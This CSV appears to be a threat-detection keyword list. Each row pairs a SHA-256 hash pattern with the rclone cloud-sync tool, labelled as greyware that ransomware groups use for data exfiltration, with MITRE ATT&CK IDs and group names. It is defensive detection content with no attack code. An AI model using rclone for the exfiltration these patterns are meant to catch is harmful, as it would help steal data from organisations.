"*955e8412ad58aa45ee195deaf5cd8cacbb9b823ad3b17e1817a03143034da878*",".{0,1000}955e8412ad58aa45ee195deaf5cd8cacbb9b823ad3b17e1817a03143034da878.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*957ab0bb1ca7a7c7ea3df8baab6fa4fef75ba9044ef46825e9986daeabc353bf*",".{0,1000}957ab0bb1ca7a7c7ea3df8baab6fa4fef75ba9044ef46825e9986daeabc353bf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*95937bf936a10b7d1da017905d221288f712fdc50dab8f88251a5db981e27b38*",".{0,1000}95937bf936a10b7d1da017905d221288f712fdc50dab8f88251a5db981e27b38.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9599ecbaa7954a040c9a1a4a56d726f921e40b4b9cf56e9ea22547aa7724cf64*",".{0,1000}9599ecbaa7954a040c9a1a4a56d726f921e40b4b9cf56e9ea22547aa7724cf64.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*95e521afe5ae87d811ad4a201d594f0c8f3421a3dbf30473fc6d677460d45219*",".{0,1000}95e521afe5ae87d811ad4a201d594f0c8f3421a3dbf30473fc6d677460d45219.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*95f952dc059b842bd40338458b77657f7b5a1680c4ca837a3adcf83b63c8fda1*",".{0,1000}95f952dc059b842bd40338458b77657f7b5a1680c4ca837a3adcf83b63c8fda1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*963469d1df890bd548f39b09d42d5fe2b81bad1ebc9089987ae95bdc0b02cce7*",".{0,1000}963469d1df890bd548f39b09d42d5fe2b81bad1ebc9089987ae95bdc0b02cce7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9640265ebb87a16317f5c3d2fbb4d96181373b8233d430c46c8f41988b4583c0*",".{0,1000}9640265ebb87a16317f5c3d2fbb4d96181373b8233d430c46c8f41988b4583c0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9651f7478e5ce54362e10b452e69b858edfb1589a4c0d23404707088b271c8f0*",".{0,1000}9651f7478e5ce54362e10b452e69b858edfb1589a4c0d23404707088b271c8f0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*96cbd0021e8b4b1e95aac299b5ec1209877d84db49f71beb16358f0f2f908953*",".{0,1000}96cbd0021e8b4b1e95aac299b5ec1209877d84db49f71beb16358f0f2f908953.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*96fdb400532a73654187a30dd0af5d345bf3eb3aa68133aaed8585cee03c7014*",".{0,1000}96fdb400532a73654187a30dd0af5d345bf3eb3aa68133aaed8585cee03c7014.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9730d3b8e639662a479982dbb6e6828ba70258620a2613dd939a2cfe90f260ff*",".{0,1000}9730d3b8e639662a479982dbb6e6828ba70258620a2613dd939a2cfe90f260ff.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*976161d326f8980972cfbbde397c28176cff14d5fe23c963283fdf5b25d2a32c*",".{0,1000}976161d326f8980972cfbbde397c28176cff14d5fe23c963283fdf5b25d2a32c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9790d2ca4e5bae3d83a3f53b22027862388ae0057649beff8d74418993956c42*",".{0,1000}9790d2ca4e5bae3d83a3f53b22027862388ae0057649beff8d74418993956c42.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9847ecb1315ea779736dc3fbf00edeb3a9c42613200bd538092c4b0987d90f35*",".{0,1000}9847ecb1315ea779736dc3fbf00edeb3a9c42613200bd538092c4b0987d90f35.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*98552bc999333d460171ad07f72dc6c30bd017c7baef2cdfa6c9f1f5d661f312*",".{0,1000}98552bc999333d460171ad07f72dc6c30bd017c7baef2cdfa6c9f1f5d661f312.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*986555b1498329e66785f700ed25f84d0fb67fbf398215a4049d9846f23100a4*",".{0,1000}986555b1498329e66785f700ed25f84d0fb67fbf398215a4049d9846f23100a4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9897be0c0beaddb4b8b81adb5fca1a0e7e702725086cfdda8b1e909febca2c05*",".{0,1000}9897be0c0beaddb4b8b81adb5fca1a0e7e702725086cfdda8b1e909febca2c05.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*98c408337b29f4a45a14339a1e1ff0124be1446aa784ec5089ed2ed07e14cf43*",".{0,1000}98c408337b29f4a45a14339a1e1ff0124be1446aa784ec5089ed2ed07e14cf43.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*98ff939169135f9fa2a57e48ef52a97eea050abc42a6362da8a180e56e118f54*",".{0,1000}98ff939169135f9fa2a57e48ef52a97eea050abc42a6362da8a180e56e118f54.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9906fa1de74605a1fa79132c436722654c4b0c941053f07eb3aa85ac4f09123f*",".{0,1000}9906fa1de74605a1fa79132c436722654c4b0c941053f07eb3aa85ac4f09123f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*995dc125d29852e24beacc8f61871fb3c51859d0130d904da9d81fced3779a51*",".{0,1000}995dc125d29852e24beacc8f61871fb3c51859d0130d904da9d81fced3779a51.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*99daaa95867cdf0758ec1d5d7f2ebdb3bf74c8c8602e2aaf888e637163d2ebdd*",".{0,1000}99daaa95867cdf0758ec1d5d7f2ebdb3bf74c8c8602e2aaf888e637163d2ebdd.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9a2d9073b4ad268a2bce887596f5008c8c92cb74fec88b54f2152a3bed181b25*",".{0,1000}9a2d9073b4ad268a2bce887596f5008c8c92cb74fec88b54f2152a3bed181b25.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9a2f0cd9aa7f2380f9d9b3eaca844d9e05219eee732329d544e4b76b75b5d018*",".{0,1000}9a2f0cd9aa7f2380f9d9b3eaca844d9e05219eee732329d544e4b76b75b5d018.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9a9f29ed242baec12d423e4cf21b1322ebac1fe738d72f64a3b1b4a45c94b4bf*",".{0,1000}9a9f29ed242baec12d423e4cf21b1322ebac1fe738d72f64a3b1b4a45c94b4bf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9b8819db42c86e4b7adb6b9fbc1bb8acd178fa05f74c4cdda27f3b5aa64deb4c*",".{0,1000}9b8819db42c86e4b7adb6b9fbc1bb8acd178fa05f74c4cdda27f3b5aa64deb4c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9baa9ae150749a196e3cd03765655c6a9c9731fbdfcb11efc22d14a4b10f7346*",".{0,1000}9baa9ae150749a196e3cd03765655c6a9c9731fbdfcb11efc22d14a4b10f7346.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9c0ae5d41ec30487350699a26406dbb0893b639f4702630ac9d735ad6c15aa5a*",".{0,1000}9c0ae5d41ec30487350699a26406dbb0893b639f4702630ac9d735ad6c15aa5a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9c1f64c5353fef38a4f90ee34a6b670f5e38a21cd629960c7eb7de50ed5ad460*",".{0,1000}9c1f64c5353fef38a4f90ee34a6b670f5e38a21cd629960c7eb7de50ed5ad460.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9c20d2016bd5f7437ec4b304ed39e17ccd1c0882c29f9ee37dfe81c9f1ea6015*",".{0,1000}9c20d2016bd5f7437ec4b304ed39e17ccd1c0882c29f9ee37dfe81c9f1ea6015.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9cb6e00ae09b73b289f3a447cc5ebbd16fabc4134c606bc25c0f4a70f715485f*",".{0,1000}9cb6e00ae09b73b289f3a447cc5ebbd16fabc4134c606bc25c0f4a70f715485f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9cd5f8810741b08aac49f12898dc623ce070f21f39820b1916361acd2522b982*",".{0,1000}9cd5f8810741b08aac49f12898dc623ce070f21f39820b1916361acd2522b982.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9d64672adf39e728aabe327e344f0735ed2d8cfd8d96a39ca4848a771f48e42d*",".{0,1000}9d64672adf39e728aabe327e344f0735ed2d8cfd8d96a39ca4848a771f48e42d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9d71d19aa4fa05a8829650c03387de1e7aea56635a1568e725463a8db3457708*",".{0,1000}9d71d19aa4fa05a8829650c03387de1e7aea56635a1568e725463a8db3457708.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9d756b853f27ac18d6b0b321e1dacef18d98fdbb3fa7d7500fce5d09cb63dd52*",".{0,1000}9d756b853f27ac18d6b0b321e1dacef18d98fdbb3fa7d7500fce5d09cb63dd52.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
